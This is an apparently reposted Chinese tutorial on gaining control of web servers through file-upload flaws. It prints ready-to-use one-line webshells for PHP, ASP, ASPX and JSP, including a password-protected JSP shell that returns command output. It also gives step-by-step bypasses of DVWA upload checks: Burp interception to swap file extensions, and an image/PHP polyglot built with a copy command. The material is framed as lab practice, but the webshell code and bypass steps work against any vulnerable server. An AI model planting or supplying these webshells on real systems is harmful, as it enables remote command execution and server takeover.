利用網站上傳漏洞使用一句話木馬控制服務器


一句話木馬

常用於php、asp、aspx

php

<?php echo shell_exec($_GET['cmd']);?>

asp

<%execute(request("value"))%>

aspx

<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>

jsp

無回顯執行系統命令

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

請求:http://192.168.16.240:8080/Shell/cmd2.jsp?cmd=ls

執行之后不會有任何回顯,用來反彈個shell很方便。

有回顯帶密碼驗證的

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

請求:http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=123&cmd=ls /

上傳文件

通過Burp Suite繞過前端驗證文件格式,通過修改數據包通過后端檢驗。

安全級別Low

前后端沒有任何驗證

安全級別Medium

僅前端判斷文件后綴名

當前端提示不能發送非jpg、png格式時,Burp Suite配置好Proxy -》 Options,並在Proxy-》Intercept-》Intercept is on,瀏覽器設置代理為Options中的配置

首先把shell.php后綴改為jpg,然后提交,在filename中把文件shell.jpg后綴改為shell.php

安全級別High

准備一個圖片和shell.php腳本,windows下運行

copy 1.png/b+shell.php/a shell.png

將圖片上傳后,使用中國菜刀連接(中國菜刀可以把圖片當成php執行)

訪問

這里以php的 <?php echo shell_exec($_GET['cmd']);?> 為例子

訪問一句話木馬文件(要知道上傳的文件目錄)

http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=ls

php中的cmd是參數

可以看到cmd參數為ls是直接查詢當前目錄下的文件

同樣可以操作其他目錄文件

其他kali下的web后門工具

webacoo

僅適用於php

weevely

僅適用於php

參考

https://blog.csdn.net/weixin_39190897/article/details/86771918


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM